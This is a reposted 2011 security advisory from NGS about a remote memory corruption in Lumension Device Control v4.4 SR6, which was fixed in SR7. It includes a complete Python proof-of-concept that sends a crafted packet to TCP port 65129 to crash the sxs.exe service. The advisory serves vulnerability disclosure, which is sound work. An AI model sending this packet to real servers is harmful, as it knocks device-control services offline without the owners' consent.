Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26925
HistoryAug 27, 2011 - 12:00 a.m.

NGS00054 Technical Advisory: : Lumension Device Control (formerly Sanctuary) remote memory corruption

2011-08-2700:00:00
vulners.com
15
JSON

=======
Summary

Name: Lumension Device Control (formerly Sanctuary) remote memory corruption
Release Date: 24 August 2011
Reference: NGS00054
Discoverer: Andy Davis <[email protected]>
Vendor: Lumension
Vendor Reference:
Systems Affected: Lumension Device Control v4.4 SR6
Risk: High
Status: Published

========
TimeLine

Discovered: 3 March 2011
Released: 3 March 2011
Approved: 3 March 2011
Reported: 3 March 2011
Fixed: 24 May 2011
Published: 24 August 2011

===========
Description

By sending a specially crafted packet to TCP port 65129 the sxs.exe service running on the Lumension application server terminates

=================
Technical Details

A simple PoC is presented here:

#!/usr/local/bin/python

import sys
from socket import *
import os

if (len(sys.argv)!=2):
print "\n--------------------------------------------------"
print "Usage: %s <target IP>" % sys.argv[0]
print "--------------------------------------------------\n"
exit(0)

host=sys.argv[1]
port=65129

packet1 = "\xec\x02\x00\x00" #length of remaining packet
packet1 += "\xc9\x00\x00\x00" #some kind of packet ID?
#packet1 += "\x18\x00\x00\x00"
packet1 += "\x61\x61\x61\x61" #crash occurs here

packet1 += "\xc8\x02\x00\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3"
packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x01\x00"
packet1 += "\x00\x00\x0d\xd8\x91\x32\x61\xf4\x43\xa1\xe1\x8e\x27\x68\x6d\xde"
packet1 += "\xbe\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x95\x00\x05\x01"
packet1 += "\x03\x00\x00\x03\x01\x10\x02\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x34\x2e\x34\x2e\x31\x34\x35\x32" #client version
packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd6\x5e"
packet1 += "\xe0\x81\xdb\xd8\xcb\x01\xe4\x95\x45\xe1\xdb\xd8\xcb\x01\x7c\x99"
packet1 += "\x47\xbc\xdb\xd8\xcb\x01\xd6\xbc\xb0\x34\xdc\xd8\xcb\x01\x02\x00"
packet1 += "\x00\x00\x9c\x47\x57\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3"
packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
packet1 += "\xc0\xa8\x00\x6b" #client IP address
packet1 += "\xff\xff\xff\x00" #client subnet mask
packet1 += "\x61\x00\x63\x00\x65\x00\x72\x00\x2d\x00\x65\x00\x38\x00"
packet1 += "\x31\x00\x37\x00\x66\x00\x61\x00\x65\x00\x30\x00\x64\x00\x38\x00" # client hostname
packet1 += "\x00" * 480
packet1 += "\x00\x00\x40\xfc\xba\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80"
packet1 += "\x85\xcc\x23\x00\x00\x00\x80\xee\x36\x00\x93\x84\xde\x84\x02\x00"
packet1 += "\x00\x00\x00\x00\x00\x00"

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(packet1)
print s.recv(1024)
s.close()

===============
Fix Information

This issue is addressed in SR7, which can be downloaded by registered customers at:
https://portal.lumension.com/

NGS Secure Research
http://www.ngssecure.com

JSON